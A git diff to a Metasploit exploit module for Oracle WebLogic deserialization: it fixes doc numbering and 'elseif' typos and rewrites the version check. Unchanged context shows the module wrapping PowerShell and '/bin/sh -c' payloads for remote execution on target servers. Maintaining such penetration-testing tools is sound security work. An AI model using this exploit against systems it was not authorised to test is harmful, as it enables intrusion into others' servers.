diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
index 114e65cc3b..ee2b5fcbb5 100644
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
@@ -7,7 +7,7 @@
  2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
  3. `set rhosts <rhost>`
  4. `set rport <srvport>`
- 6. `exploit`
+ 5. `exploit`
 ## Scenarios
 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
  ```
diff --git a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
index 8e4919dcfc..3a45357469 100644
--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -84,26 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
     return CheckCode::Unknown unless res
 
-    /WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res
-    if version
-      version = Gem::Version.new(version)
-      print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
-
-      case
-      when version.to_s.start_with?('10.3')
-        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
-      when version.to_s.start_with?('12.1.3')
-        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
-      when version.to_s.start_with?('12.2')
-        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
-      end
+    unless res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Safe
     end
 
-    if res.include?('Oracle WebLogic Server Administration Console')
-      return CheckCode::Detected
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    unless version
+      return CheckCode::Safe
     end
 
-    CheckCode::Unknown
+    version = Gem::Version.new(version)
+    vprint_good("Detected Oracle WebLogic Server Version: #{version}")
+    case
+    when version.to_s.start_with?('10.3')
+      return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+    when version.to_s.start_with?('12.1.3')
+      return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+    when version.to_s.start_with?('12.2')
+      return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
+    end
+
+    return CheckCode::Safe
   end
 
   def t3_handshake
@@ -179,11 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
     if target.name == 'Windows'
       pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
       mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
-    elseif target.name == 'Unix'
+    elsif target.name == 'Unix'
       nix_cmd = payload.encoded
       nix_cmd.prepend('/bin/sh -c ')
       mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
-    elseif target.name == 'Solaris'
+    elsif target.name == 'Solaris'
       sol_cmd = payload.encoded
       mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
     end